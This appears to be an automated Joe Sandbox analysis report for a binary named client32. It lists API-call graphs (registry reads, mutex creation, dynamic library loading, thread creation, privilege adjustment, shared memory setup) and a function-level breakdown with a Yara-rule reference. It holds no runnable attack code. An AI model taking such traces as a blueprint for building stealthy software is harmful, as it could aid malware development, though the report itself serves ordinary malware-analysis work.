261 API calls 105548->105552 105551 111601fd std::locale::_Init 75 API calls 105549->105551 105553 1110c420 std::locale::_Init 261 API calls 105550->105553 105554 110302f4 105551->105554 105555 11030414 105552->105555 105556 110304d8 105553->105556 105557 11030312 105554->105557 105558 111601fd std::locale::_Init 75 API calls 105554->105558 105561 11105d40 443 API calls 105555->105561 105624 110f8130 268 API calls std::locale::_Init 105556->105624 105560 1115f5b7 std::locale::_Init 75 API calls 105557->105560 105558->105554 105565 1103031e 105560->105565 105562 11030430 GetStockObject GetObjectA 105561->105562 105564 11030696 SetErrorMode SetErrorMode 105562->105564 105568 1110c420 std::locale::_Init 261 API calls 105564->105568 105565->105545 105567 1113f670 std::locale::_Init RegQueryValueExA 105565->105567 105570 11030374 105567->105570 105569 110306d2 105568->105569 105572 11027fe0 264 API calls 105569->105572 105571 1113f670 std::locale::_Init RegQueryValueExA 105570->105571 105573 1103039d 105571->105573 105574 110306ec 105572->105574 105573->105545 105575 1110c420 std::locale::_Init 261 API calls 105574->105575 105576 11030712 105575->105576 105577 11027fe0 264 API calls 105576->105577 105578 1103072b InterlockedExchange 105577->105578 105580 1110c420 std::locale::_Init 261 API calls 105578->105580 105581 11030753 105580->105581 105582 11089840 263 API calls 105581->105582 105583 1103076b GetACP 105582->105583 105585 1115f8a3 _sprintf 96 API calls 105583->105585 105586 11030792 105585->105586 105587 11161c63 _setlocale 97 API calls 105586->105587 105588 1103079c 105587->105588 105589 1113f220 82 API calls 105588->105589 105590 110307c8 105589->105590 105591 1110c420 std::locale::_Init 261 API calls 105590->105591 105592 110307e8 105591->105592 105593 11060520 261 API calls 105592->105593 105594 11030813 105593->105594 105595 1110c420 std::locale::_Init 261 API calls 105594->105595 105597 1103083a 105594->105597 105595->105597 105596 110cb920 4 API calls 105598 11030886 105596->105598 105597->105596 105599 1110c420 std::locale::_Init 261 API calls 105598->105599 105600 1103088d 105599->105600 105601 110308e0 105600->105601 105602 11030967 105600->105602 105603 1110c420 std::locale::_Init 261 API calls 105601->105603 105609 11030965 std::ios_base::_Tidy 105602->105609 105627 11121fc0 430 API calls 105602->105627 105605 110308e7 105603->105605 105604 1100d500 FreeLibrary 105607 11030980 105604->105607 105608 110308ff 105605->105608 105610 110879a0 264 API calls 105605->105610 105611 1100d220 wsprintfA 105607->105611 105615 11030999 105607->105615 105612 1110c420 std::locale::_Init 261 API calls 105608->105612 105609->105604 105610->105608 105613 1103098e 105611->105613 105614 11030916 105612->105614 105616 11142a60 std::locale::_Init 21 API calls 105613->105616 105620 1103093a 105614->105620 105625 1105b8c0 299 API calls 105614->105625 105618 1115e4d1 __setlocale_nolock 5 API calls 105615->105618 105616->105615 105619 11030aff 105618->105619 105624->105562 105625->105620 105627->105609 105628 1106132b 105629 11061333 105628->105629 105630 110614b7 105629->105630 105632 11160c1d _fgets 49 API calls 105629->105632 105631 11160c1d _fgets 49 API calls 105630->105631 105635 110614d1 105631->105635 105633 11061367 105632->105633 105634 1106136e 105633->105634 105643 110613bd _strpbrk std::locale::_Init 105633->105643 105636 110613a3 105634->105636 105639 11160535 std::locale::_Init 98 API calls 105634->105639 105638 1106151d 105635->105638 105641 11160535 std::locale::_Init 98 API calls 105635->105641 105637 110ce4f0 261 API calls 105636->105637 105642 110613b1 std::ios_base::_Tidy 105637->105642 105640 110ce4f0 261 API calls 105638->105640 105639->105636 105640->105642 105641->105638 105644 1115e4d1 __setlocale_nolock 5 API calls 105642->105644 105646 1115f5b7 std::locale::_Init 75 API calls 105643->105646 105645 1106225f 105644->105645 105647 1106142d 105646->105647 105648 111415b0 8 API calls 105647->105648 105649 11061449 105648->105649 105649->105630 105650 11061458 105649->105650 105651 1106149d 105650->105651 105653 11160535 std::locale::_Init 98 API calls 105650->105653 105652 110ce4f0 261 API calls 105651->105652 105652->105642 105653->105651 105654 68b4b359 HeapCreate 105655 688f63a0 105660 688f6350 105655->105660 105658 688f63a9 WSACancelBlockingCall 105659 688f63b1 Sleep 105661 688f638d 105660->105661 105662 689128e1 ___crtMessageBoxW 5 API calls 105661->105662 105663 688f6397 105662->105663 105663->105658 105663->105659 105664 1102ce2d InterlockedIncrement 105665 1102ce59 GetCurrentProcess SetPriorityClass 105664->105665 105666 1102ce3c 105664->105666 105668 1102ce8d 105665->105668 105667 11142a60 std::locale::_Init 21 API calls 105666->105667 105669 1102ce46 105667->105669 105671 1102ce96 SetEvent 105668->105671 105672 1102ce9d 105668->105672 105670 1102ce50 Sleep 105669->105670 105670->105670 105671->105672 105674 1102ced4 105672->105674 105759 11029010 275 API calls 2 library calls 105672->105759 105673 1102cf02 105762 11028b10 499 API calls std::locale::_Init 105673->105762 105674->105673 105761 1109e4e0 271 API calls std::locale::_Init 105674->105761 105678 1102cebd 105760 110fd040 274 API calls 2 library calls 105678->105760 105679 1102cf13 105742 11027d00 SetEvent 105679->105742 105682 1102cf18 105683 1102cf22 105682->105683 105684 1102cf4f 105682->105684 105683->105682 105763 11058ac0 SetEvent 105683->105763 105686 1102cf57 105684->105686 105687 1102cf8e 105684->105687 105686->105687 105694 1102cf83 Sleep 105686->105694 105688 11142a60 std::locale::_Init 21 API calls 105687->105688 105689 1102cf98 105688->105689 105690 1102cfa5 105689->105690 105691 1102cfd6 105689->105691 105690->105689 105692 1105d340 75 API calls 105690->105692 105693 1102cfd3 105691->105693 105743 110af250 105691->105743 105695 1102cfc8 105692->105695 105693->105691 105694->105687 105695->105691 105764 1102cc30 290 API calls std::locale::_Init 105695->105764 105702 1102d01a 105703 1102d02d 105702->105703 105766 11132620 295 API calls 5 library calls 105702->105766 105705 1100d500 FreeLibrary 105703->105705 105706 1102d339 105705->105706 105707 1102d350 105706->105707 105708 1100d220 wsprintfA 105706->105708 105711 1102d377 GetModuleFileNameA GetFileAttributesA 105707->105711 105719 1102d493 105707->105719 105709 1102d345 105708->105709 105710 11142a60 std::locale::_Init 21 API calls 105709->105710 105710->105707 105713 1102d39f 105711->105713 105711->105719 105712 11142a60 std::locale::_Init 21 API calls 105714 1102d542 105712->105714 105715 1110c420 std::locale::_Init 261 API calls 105713->105715 105719->105712 105742->105682 105770 1107f690 105743->105770 105748 1102cffa 105752 110e8da0 105748->105752 105749 110af297 105782 110290f0 261 API calls 2 library calls 105749->105782 105753 110af250 263 API calls 105752->105753 105754 110e8dcd 105753->105754 105798 110e8170 105754->105798 105758 1102d005 105765 110af440 263 API calls std::locale::_Init 105758->105765 105759->105678 105760->105674 105761->105673 105762->105679 105763->105684 105764->105693 105765->105702 105766->105703 105771 1107f6b4 105770->105771 105772 1107f6cf 105771->105772 105773 1107f6b8 105771->105773 105774 1107f6cc 105772->105774 105775 1107f6e8 105772->105775 105783 110290f0 261 API calls 2 library calls 105773->105783 105774->105772 105784 110290f0 261 API calls 2 library calls 105774->105784 105779 110af240 105775->105779 105785 11080370 105779->105785 105786 11080391 105785->105786 105787 110803bd 105785->105787 105786->105787 105788 110803ab 105786->105788 105789 1108040a wsprintfA 105787->105789 105790 110803e5 wsprintfA 105787->105790 105791 1115e4d1 __setlocale_nolock 5 API calls 105788->105791 105797 110290f0 261 API calls 2 library calls 105789->105797 105790->105787 105793 110803b9 105791->105793 105793->105748 105793->105749 105800 110e817b 105798->105800 105799 110e8215 105808 110af440 263 API calls std::locale::_Init 105799->105808 105800->105799 105801 110e819e 105800->105801 105803 110e81b5 105800->105803 105809 110290f0 261 API calls 2 library calls 105801->105809 105804 110e81b2 105803->105804 105805 110e81e2 SendMessageTimeoutA 105803->105805 105804->105803 105810 110290f0 261 API calls 2 library calls 105804->105810 105805->105799 105808->105758 105811 1110e460 105823 1110e3c0 GetSystemDirectoryA 105811->105823 105815 1110e525 105816 1115e4d1 __setlocale_nolock 5 API calls 105815->105816 105817 1110e532 105816->105817 105818 1110e4bb 105818->105815 105819 1110e4f9 GetComputerNameA 105818->105819 105819->105815 105820 1110e512 105819->105820 105829 110cf020 265 API calls 2 library calls 105820->105829 105822 1110e522 105822->105815 105824 1110e40a __wsplitpath 105823->105824 105825 1110e419 GetVolumeInformationA 105824->105825 105826 1115e4d1 __setlocale_nolock 5 API calls 105825->105826 105827 1110e450 105826->105827 105828 110cf020 265 API calls 2 library calls 105827->105828 105828->105818 105829->105822 105830 11073b73 105854 1106fa20 105830->105854 105832 11073b7a 6 API calls 105833 11073bc1 105832->105833 105834 11073bd8 105832->105834 105879 110290f0 261 API calls 2 library calls 105833->105879 105836 1110c420 std::locale::_Init 261 API calls 105834->105836 105838 11073bdf 105836->105838 105839 1110d060 420 API calls 105838->105839 105840 11073bfb _strncpy 105839->105840 105841 1105d340 75 API calls 105840->105841 105842 11073c3f 105841->105842 105845 11073c6c ExpandEnvironmentStringsA 105842->105845 105850 11073c94 105842->105850 105843 11073d06 CreateThread CloseHandle 105844 1110c420 std::locale::_Init 261 API calls 105843->105844 105940 1106fd70 105843->105940 105846 11073d30 105844->105846 105845->105850 105847 11073d4c SetTimer 105846->105847 105848 1110d060 420 API calls 105846->105848 105851 11073d88 105847->105851 105848->105847 105850->105843 105852 1115e4d1 __setlocale_nolock 5 API calls 105851->105852 105853 11073dff 105852->105853 105855 1110c420 std::locale::_Init 261 API calls 105854->105855 105856 1106fa5c 105855->105856 105857 1106fab5 105856->105857 105858 1106fa63 105856->105858 105885 1115e96a 34 API calls std::exception::_Copy_str 105857->105885 105880 11087510 105858->105880 105862 1106fac8 105886 1115edc1 RaiseException 105862->105886 105864 1106fadd 105887 110879e0 277 API calls std::locale::_Init 105864->105887 105866 1106fb37 std::locale::_Init std::ios_base::_Tidy _memmove 105869 1106fd05 LeaveCriticalSection 105866->105869 105888 11088b00 268 API calls 105866->105888 105889 11069be0 316 API calls 105866->105889 105890 1106cc70 83 API calls 105866->105890 105891 1100fa30 35 API calls 2 library calls 105866->105891 105892 1100ff10 262 API calls 3 library calls 105866->105892 105893 1106ce90 84 API calls std::ios_base::_Tidy 105866->105893 105868 1106fc0c EnterCriticalSection 105868->105866 105869->105866 105871 1106fd1d InterlockedDecrement 105869->105871 105872 1106fd37 std::ios_base::_Tidy 105871->105872 105894 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 105872->105894 105875 1106fd50 std::ios_base::_Tidy 105875->105832 105895 1115e4f0 105880->105895 105885->105862 105886->105864 105887->105866 105888->105868 105889->105866 105890->105866 105891->105866 105892->105866 105893->105866 105894->105875 105896 11087534 InitializeCriticalSection 105895->105896 105897 11087380 105896->105897 105898 11142150 267 API calls 105897->105898 105900 110873b3 105898->105900 105899 1106faa3 105899->105832 105900->105899 105900->105900 105901 1110c420 std::locale::_Init 261 API calls 105900->105901 105904 11087409 105901->105904 105902 1108744d 105910 11085840 105902->105910 105903 11087436 105939 110290f0 261 API calls 2 library calls 105903->105939 105904->105902 105904->105903 105908 11142150 267 API calls 105909 11087458 105908->105909 105909->105899 105909->105908 105909->105909 105911 1108585b 105910->105911 105912 1108585f 105911->105912 105913 11085870 105911->105913 105914 1115e4d1 __setlocale_nolock 5 API calls 105912->105914 105915 11141240 std::locale::_Init 261 API calls 105913->105915 105916 1108586c 105914->105916 105917 11085877 105915->105917 105916->105909 105917->105917 105918 1108589b LoadLibraryA 105917->105918 105919 11085939 GetProcAddress 105918->105919 105920 110858d4 105918->105920 105923 110859dc 105919->105923 105924 11085954 GetProcAddress 105919->105924 105921 110858dd GetModuleFileNameA 105920->105921 105922 11085930 105920->105922 105925 11080be0 std::locale::_Init IsDBCSLeadByte 105921->105925 105922->105919 105922->105923 105927 1115e4d1 __setlocale_nolock 5 API calls 105923->105927 105924->105923 105926 11085965 GetProcAddress 105924->105926 105928 110858fe LoadLibraryA 105925->105928 105926->105923 105929 11085976 GetProcAddress 105926->105929 105930 110859ea 105927->105930 105928->105922 105929->105923 105931 11085987 GetProcAddress 105929->105931 105930->105909 105931->105923 105932 11085998 GetProcAddress 105931->105932 105932->105923 105933 110859a9 GetProcAddress 105932->105933 105933->105923 105934 110859ba GetProcAddress 105933->105934 105934->105923 105935 110859cb GetProcAddress 105934->105935 105935->105923 105936 110859ee 105935->105936 105937 1115e4d1 __setlocale_nolock 5 API calls 105936->105937 105938 11085a00 105937->105938 105938->105909 105946 1106fda0 std::ios_base::_Tidy 105940->105946 105941 1106ff03 105942 1106fdc2 Sleep EnterCriticalSection 105942->105946 105943 1106fe7e LeaveCriticalSection 105943->105946 105946->105941 105946->105942 105946->105943 105948 1106fedd 105946->105948 105950 1106ae60 294 API calls 105946->105950 105951 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 105946->105951 105948->105946 105952 1106e810 332 API calls 3 library calls 105948->105952 105953 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 105948->105953 105950->105946 105951->105946 105952->105948 105953->105948 105954 1102ff34 105955 1113f0c0 263 API calls 105954->105955 105956 1102ff42 105955->105956 105957 1113f220 82 API calls 105956->105957 105958 1102ff85 105957->105958 105959 1102ff9a 105958->105959 105960 11080c50 82 API calls 105958->105960 105961 110eaed0 8 API calls 105959->105961 105960->105959 105962 1102ffc5 105961->105962 105963 1103000c 105962->105963 106005 110eaf80 77 API calls 2 library calls 105962->106005 105966 1113f220 82 API calls 105963->105966 105965 1102ffda 106006 110eaf80 77 API calls 2 library calls 105965->106006 105968 11030021 105966->105968 105970 1110c420 std::locale::_Init 261 API calls 105968->105970 105969 1102fff0 105969->105963 105971 111429e0 19 API calls 105969->105971 105972 11030030 105970->105972 105971->105963 105973 11030051 105972->105973 105974 110879a0 264 API calls 105972->105974 105975 11089840 263 API calls 105973->105975 105974->105973 105976 11030064 OpenMutexA 105975->105976 105977 11030083 CreateMutexA 105976->105977 105978 1103016c CloseHandle 105976->105978 105979 110300a5 105977->105979 105998 11089940 105978->105998 105981 1110c420 std::locale::_Init 261 API calls 105979->105981 105985 110300ba 105981->105985 105982 11030182 105983 1115e4d1 __setlocale_nolock 5 API calls 105982->105983 105984 11030aff 105983->105984 106007 11015e10 LoadLibraryA 105985->106007 105987 110300ef 105988 11030103 GetProcAddress 105987->105988 105989 11030119 105987->105989 105988->105989 105990 1103011d SetLastError 105988->105990 105991 11027e10 47 API calls 105989->105991 105990->105989 105992 1103012a 105991->105992 106008 11009320 423 API calls std::locale::_Init 105992->106008 105994 11030139 105995 11030142 WaitForSingleObject 105994->105995 105995->105995 105996 11030154 CloseHandle 105995->105996 105996->105978 105997 11030165 FreeLibrary 105996->105997 105997->105978 105999 110899e7 105998->105999 106002 1108997a std::ios_base::_Tidy 105998->106002 106000 110899ee DeleteCriticalSection 105999->106000 106009 11139f90 106000->106009 106001 1108998e CloseHandle 106001->106002 106002->105999 106002->106001 106004 11089a14 std::ios_base::_Tidy 106004->105982 106005->105965 106006->105969 106007->105987 106008->105994 106012 11139fa4 106009->106012 106010 11139fa8 106010->106004 106012->106010 106013 11139bb0 35 API calls 2 library calls 106012->106013 106013->106012 106014 68915ae6 106015 68915af1 106014->106015 106016 68915af6 106014->106016 106028 6891f28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 106015->106028 106020 689159f0 106016->106020 106019 68915b04 106021 689159fc ___FrameUnwindToState 106020->106021 106024 68915a49 ___DllMainCRTStartup 106021->106024 106027 68915a99 ___FrameUnwindToState 106021->106027 106029 6891588c 106021->106029 106023 68915a79 106025 6891588c __CRT_INIT@12 149 API calls 106023->106025 106023->106027 106024->106023 106026 6891588c __CRT_INIT@12 149 API calls 106024->106026 106024->106027 106025->106027 106026->106023 106027->106019 106028->106016 106030 68915898 ___FrameUnwindToState 106029->106030 106031 689158a0 106030->106031 106032 6891591a 106030->106032 106082 6891607f HeapCreate 106031->106082 106034 68915920 106032->106034 106035 6891597b 106032->106035 106041 6891593e 106034->106041 106049 689158a9 ___FrameUnwindToState 106034->106049 106101 68915e35 66 API calls _doexit 106034->106101 106036 68915980 106035->106036 106037 689159d9 106035->106037 106083 68916da9 TlsGetValue 106036->106083 106037->106049 106107 689170ad 79 API calls __freefls@4 106037->106107 106038 689158a5 106040 689158b0 106038->106040 106038->106049 106092 68917127 86 API calls 5 library calls 106040->106092 106046 68915952 106041->106046 106102 68919b09 67 API calls _free 106041->106102 106105 68915965 70 API calls __mtterm 106046->106105 106049->106024 106052 689158b5 __RTC_Initialize 106053 689158b9 106052->106053 106058 689158c5 GetCommandLineA 106052->106058 106093 6891609d HeapDestroy 106053->106093 106054 68915948 106103 68916dfa 70 API calls _free 106054->106103 106055 6891599d DecodePointer 106063 689159b2 106055->106063 106094 6891f016 71 API calls 2 library calls 106058->106094 106059 689158be 106059->106049 106060 6891594d 106104 6891609d HeapDestroy 106060->106104 106065 689159b6 106063->106065 106066 689159cd 106063->106066 106064 689158d5 106095 689198c4 73 API calls __calloc_crt 106064->106095 106106 68916e37 66 API calls 4 library calls 106065->106106 106067 68911bfd _free 66 API calls 106066->106067 106067->106049 106070 689158df 106072 689158e3 106070->106072 106097 6891ef5b 95 API calls 3 library calls 106070->106097 106071 689159bd GetCurrentThreadId 106071->106049 106096 68916dfa 70 API calls _free 106072->106096 106075 689158ef 106076 68915903 106075->106076 106098 6891ecd4 94 API calls 6 library calls 106075->106098 106081 68915908 106076->106081 106100 68919b09 67 API calls _free 106076->106100 106079 689158f8 106079->106076 106099 68915c32 77 API calls 4 library calls 106079->106099 106081->106049 106082->106038 106084 68915985 106083->106084 106085 68916dbe DecodePointer TlsSetValue 106083->106085 106086 6891d3f5 106084->106086 106085->106084 106088 6891d3fe 106086->106088 106087 6891a082 __calloc_crt 65 API calls 106087->106088 106088->106087 106089 68915991 106088->106089 106090 6891d41c Sleep 106088->106090 106089->106049 106089->106055 106091 6891d431 106090->106091 106091->106088 106091->106089 106092->106052 106093->106059 106094->106064 106095->106070 106096->106053 106097->106075 106098->106079 106099->106076 106100->106072 106101->106041 106102->106054 106103->106060 106104->106046 106105->106049 106106->106071 106107->106049 106108 1106043a 106109 1105fda0 266 API calls 106108->106109 106110 1106044c 106109->106110 106111 11060488 106110->106111 106115 1105fda0 266 API calls 106110->106115 106117 1105fbf0 37 API calls std::ios_base::_Tidy 106111->106117 106113 1106049a 106114 1115e4d1 __setlocale_nolock 5 API calls 106113->106114 106116 110604b2 106114->106116 106115->106110 106117->106113

                                                                                                                                        Executed Functions

                                                                                                                                        Function 1109D4A0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 614 1109d4a0-1109d502 call 1109cc90 617 1109d508-1109d52b call 1109c750 614->617 618 1109db20 614->618 623 1109d531-1109d545 LocalAlloc 617->623 624 1109d694-1109d696 617->624 620 1109db22-1109db3d call 1115e4d1 618->620 626 1109d54b-1109d57d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 623->626 627 1109db15-1109db1b call 1109c7e0 623->627 628 1109d626-1109d64b CreateFileMappingA 624->628 631 1109d60a-1109d620 626->631 632 1109d583-1109d5ae call 1109c6c0 call 1109c700 626->632 627->618 629 1109d698-1109d6ab GetLastError 628->629 630 1109d64d-1109d66d GetLastError call 110ee9e0 628->630 636 1109d6ad 629->636 637 1109d6b2-1109d6c9 MapViewOfFile 629->637 642 1109d678-1109d680 630->642 643 1109d66f-1109d676 LocalFree 630->643 631->628 660 1109d5f9-1109d601 632->660 661 1109d5b0-1109d5e6 GetSecurityDescriptorSacl 632->661 636->637 640 1109d6cb-1109d6e6 call 110ee9e0 637->640 641 1109d707-1109d70f 637->641 663 1109d6e8-1109d6e9 LocalFree 640->663 664 1109d6eb-1109d6f3 640->664 644 1109d7b1-1109d7c3 641->644 645 1109d715-1109d72e GetModuleFileNameA 641->645 652 1109d682-1109d683 LocalFree 642->652 653 1109d685-1109d68f 642->653 643->642 648 1109d809-1109d822 call 1115e4f0 GetTickCount 644->648 649 1109d7c5-1109d7c8 644->649 650 1109d7cd-1109d7e8 call 110ee9e0 645->650 651 1109d734-1109d73d 645->651 680 1109d824-1109d829 648->680 656 1109d8af-1109d913 GetCurrentProcessId GetModuleFileNameA call 1109cb20 649->656 678 1109d7ea-1109d7eb LocalFree 650->678 679 1109d7ed-1109d7f5 650->679 651->650 657 1109d743-1109d746 651->657 652->653 659 1109db0e-1109db10 call 1109cbd0 653->659 684 1109d91b-1109d932 CreateEventA 656->684 685 1109d915 656->685 668 1109d789-1109d7ac call 110ee9e0 call 1109cbd0 657->668 669 1109d748-1109d74c 657->669 659->627 660->631 673 1109d603-1109d604 FreeLibrary 660->673 661->660 672 1109d5e8-1109d5f3 SetSecurityDescriptorSacl 661->672 663->664 665 1109d6f8-1109d702 664->665 666 1109d6f5-1109d6f6 LocalFree 664->666 665->659 666->665 668->644 669->668 677 1109d74e-1109d759 669->677 672->660 673->631 686 1109d760-1109d764 677->686 678->679 687 1109d7fa-1109d804 679->687 688 1109d7f7-1109d7f8 LocalFree 679->688 681 1109d82b-1109d83a 680->681 682 1109d83c 680->682 681->680 681->682 689 1109d83e-1109d844 682->689 693 1109d934-1109d953 GetLastError * 2 call 110ee9e0 684->693 694 1109d956-1109d95e 684->694 685->684 691 1109d780-1109d782 686->691 692 1109d766-1109d768 686->692 687->659 688->687 695 1109d855-1109d8ad 689->695 696 1109d846-1109d853 689->696 700 1109d785-1109d787 691->700 697 1109d76a-1109d770 692->697 698 1109d77c-1109d77e 692->698 693->694 701 1109d960 694->701 702 1109d966-1109d977 CreateEventA 694->702 695->656 696->689 696->695 697->691 705 1109d772-1109d77a 697->705 698->700 700->650 700->668 701->702 703 1109d979-1109d998 GetLastError * 2 call 110ee9e0 702->703 704 1109d99b-1109d9a3 702->704 703->704 708 1109d9ab-1109d9bd CreateEventA 704->708 709 1109d9a5 704->709 705->686 705->698 711 1109d9bf-1109d9de GetLastError * 2 call 110ee9e0 708->711 712 1109d9e1-1109d9e9 708->712 709->708 711->712 714 1109d9eb 712->714 715 1109d9f1-1109da02 CreateEventA 712->715 714->715 717 1109da24-1109da32 715->717 718 1109da04-1109da21 GetLastError * 2 call 110ee9e0 715->718 719 1109da34-1109da35 LocalFree 717->719 720 1109da37-1109da3f 717->720 718->717 719->720 722 1109da41-1109da42 LocalFree 720->722 723 1109da44-1109da4d 720->723 722->723 725 1109da53-1109da56 723->725 726 1109daf7-1109db09 call 110ee9e0 723->726 725->726 728 1109da5c-1109da5f 725->728 726->659 728->726 730 1109da65-1109da68 728->730 730->726 731 1109da6e-1109da71 730->731 732 1109da7c-1109da98 CreateThread 731->732 733 1109da73-1109da79 GetCurrentThreadId 731->733 734 1109da9a-1109daa4 732->734 735 1109daa6-1109dab0 732->735 733->732 734->659 736 1109daca-1109daf5 SetEvent call 110ee9e0 call 1109c7e0 735->736 737 1109dab2-1109dac8 ResetEvent * 3 735->737 736->620 737->736
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,A0A8B03E,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                          • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                          • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                          • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,A0A8B03E,00080000,00000000,00000000), ref: 1109D535
                                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
                                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 1109D570
                                                                                                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
                                                                                                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
                                                                                                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
                                                                                                                                        • CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D64D
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D676
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D683
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D6A0
                                                                                                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D6E9
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D6F6
                                                                                                                                          • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
                                                                                                                                          • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D7EB
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D7F8
                                                                                                                                        • _memset.LIBCMT ref: 1109D810
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1109D818
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1109D8C4
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
                                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D934
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D93B
                                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D979
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109DA35
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                                        • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
